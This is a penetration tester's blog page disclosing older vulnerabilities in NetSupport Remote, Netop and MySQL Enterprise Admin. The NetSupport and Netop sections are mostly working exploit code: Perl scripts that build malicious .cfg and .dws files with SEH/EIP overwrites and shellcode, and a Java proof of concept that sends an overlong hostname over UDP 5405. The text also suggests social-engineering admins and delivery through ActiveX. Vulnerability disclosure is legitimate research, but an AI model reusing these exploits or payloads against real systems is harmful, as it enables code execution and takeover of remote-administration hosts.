Vulnerabilities

This page is used to store some older vulnerabilities discovered during penetration testing engagements before focusing solely on financial trading systems security.

Netsupport Remote Version 10 Local and Remote Buffer Overflow [30/07/2011]
I came across Netsupport Remote Control during a pentest engagement, when I got back to the lab I took a look at it in more detail as I suspected similar bugs exist that have been found wtith Netop and other remote admin software. Sure enough I was right and discovered a local file format overflow and a remote buffer overflow (running as SYSTEM on the Windows version). Netsupport have since released Version 11 which should address these issues.
The local file format is a bit lame, as you need to manually import the .cfg file, it can not be triggered using the default handler, ActiveX or anything equally as cool; your going to have to social engineer the admin to go Tools > Import > Config..
Anyway, here is the perl script to generate the malicious config file:
#!/usr/bin/perl
# NetSupport Version 10 Local Buffer Overflow

my $junk="\x41" x 92;
my $nseh="\xeb\x1e\x90\x90";,
my $seh = pack('V',0x102350d4);#"\xd4\x50\x23\x10";
my $nops="\x90" x 24;
my $break="\xcc\xcc\xcc\xcc";

# shellcode, metasploit.com calc.exe size=164
my $shellcode =
"\x90\x90\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61".
"\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13".
"\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f".
"\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b".
"\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30".
"\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72".
"\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd".
"\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e".
"\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52".
"\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56";

my $payload = $junk.$nseh.$seh.$nops.$shellcode;
my $file = "config.cfg" ; #file name
open(my $FILE, ">$file") or die "Cannot open $file: $!";
print $FILE $payload ;
close($FILE);
print "Created Exploit: $file \n";
The remote vulnerability is a little cooler and allows exploitation of the remote admin client , which in turn can administer all the guest clients in the environment = Total Pwnage. Netsupport listens on UDP port 5405 for incoming "Hello, where are you?" requests from the server agent, the client then responds with its hostname that is added to an array on the server and an admin can then select this hostname to connect to and control.
Yep, you guessed it, the Netsupport Server agent does not check the length of hostname before copying it into the array. The following dirty Java code should be enough of a PoC to get a working exploit:
DatagramSocket serverSocket = new DatagramSocket(5405);
byte[] buf = new byte[256];
DatagramPacket packet = new DatagramPacket(buf, buf.length);
serverSocket.receive(packet);
DatagramSocket socket = new DatagramSocket();
byte[] byteArrayShellcode2 = new byte[] {0x02, 0x00, 0x41, 0x61, 0x30, 0x41, 0x61, 0x31, 0x41, 0x61, 0x32, 0x41, 0x61, 0x33, 0x41, 0x61, 0x34, 0x41, 0x61, 0x35, 0x41, 0x61, 0x36, 0x41, 0x61, 0x37, 0x41, 0x61, 0x38, 0x41, 0x61, 0x39, 0x41, 0x62, 0x30, 0x41, 0x62, 0x31, 0x41, 0x62, 0x32,  0x41, 0x62, 0x33, 0x41, 0x62, 0x34, 0x41, 0x62, 0x35, 0x41, 0x62, 0x36, 0x41, 0x62, 0x37, 0x41, 0x62, 0x38, 0x41, 0x62, 0x39, 0x41, 0x63, 0x30, 0x41, 0x63, 0x31, 0x41, 0x63, 0x32, 0x41, 0x63, 0x33, 0x41, 0x63, 0x34, 0x41, 0x63, 0x35, 0x41, 0x63, 0x36, 0x41, 0x63, 0x37, 0x41, 0x63, 0x38,  0x41, 0x63, 0x39, 0x41, 0x64, 0x30, 0x41, 0x64, 0x31, 0x41, 0x64, 0x32, 0x41, 0x64, 0x33, 0x41, 0x64, 0x34, 0x41, 0x64, 0x35, 0x41, 0x64, 0x36, 0x41, 0x64, 0x37, 0x41, 0x64, 0x38, 0x41, 0x64, 0x39, 0x41, 0x65, 0x30, 0x41, 0x65, 0x31, 0x41, 0x65, 0x32, 0x41, 0x65, 0x33, 0x41, 0x65, 0x34,  0x41, 0x65, 0x35, 0x41, 0x65, 0x36, 0x41, 0x65, 0x37, 0x41, 0x65, 0x38, 0x41, 0x65, 0x39, 0x41, 0x66, 0x30, 0x41, 0x66, 0x31, 0x41, 0x66, 0x32, 0x41, 0x66, 0x33, 0x41, 0x66, 0x34, 0x41, 0x66, 0x35, 0x41, 0x66, 0x36, 0x41, 0x66, 0x37, 0x41, 0x66, 0x38, 0x41, 0x66, 0x39, 0x41, 0x67, 0x30,  0x41, 0x67, 0x31, 0x41, 0x67, 0x32, 0x41, 0x67, 0x33, 0x41, 0x67, 0x34, 0x41, 0x67, 0x35, 0x41, 0x67, 0x36, 0x41, 0x67, 0x37};
String value = new String(byteArrayShellcode2);
ByteArrayOutputStream byteOut = new  ByteArrayOutputStream ();
DataOutputStream dataOut = new DataOutputStream (byteOut);
dataOut.writeBytes(value);
byte[] data = byteOut.toByteArray();
DatagramPacket clientPacket = new DatagramPacket(data, data.length, packet.getAddress(), packet.getPort());
socket.send(clientPacket);
socket.close();
serverSocket.close();
The above payload uses a metasploit pattern so you cant trace it in your debugger of choice.
Thats it for now. Cheers.


Netop 9.22 File Format Buffer Overflow [30/07/2011]
I discovered a buffer overflow with Netop when it handles .dws (the default netop session files). I reported it to Netop in early 2010 and they sat on it until somebody dropped it on the full disclosure mailing list :-) Here is the exploit from chap0 hosted on exploit-db, he did a more thorough job than me and made it compatible for Netop 8.0 - 9.5.
So here is my attempt, simple perl script to create a malicious .dws file to spawn the old faithful; calc.exe.
 #!/usr/bin/perl
# NetOP Guest Version 9.22 Local Buffer Overflow
# Mylestro

my $buf = "\x41" x 524;
my $eip = "\x70\x85\x11\x00" ; #\x70\x85\x11\x00

# shellcode, metasploit.com calc.exe size=164
my $shellcode =
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61".
"\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13".
"\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f".
"\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b".
"\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30".
"\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72".
"\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd".
"\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e".
"\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52".
"\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56";

my $exploit = "$buf$eip$shellcode"; #exploit structure
my $file = "NetOpScript.dws" ; #file name
open(my $FILE, ">$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Created Exploit: $file \n";
Netop has the ability to launch the client and configure it with .dws scripts from an ActiveX control....il leave the rest to you ;-)

MySQL Enterprise Admin [30/07/2011]
Two comedy web application bugs discovered with MySQL enterprise admin, one is a XSS and the other is a privilege escalation (from read-only to super user) via parameter manipulation (I was actually looking for buffer overflows in the MySQL agent but shelved the project as I had heaps of other stuff to do). Anyway, I reported them and they got fixed within two weeks.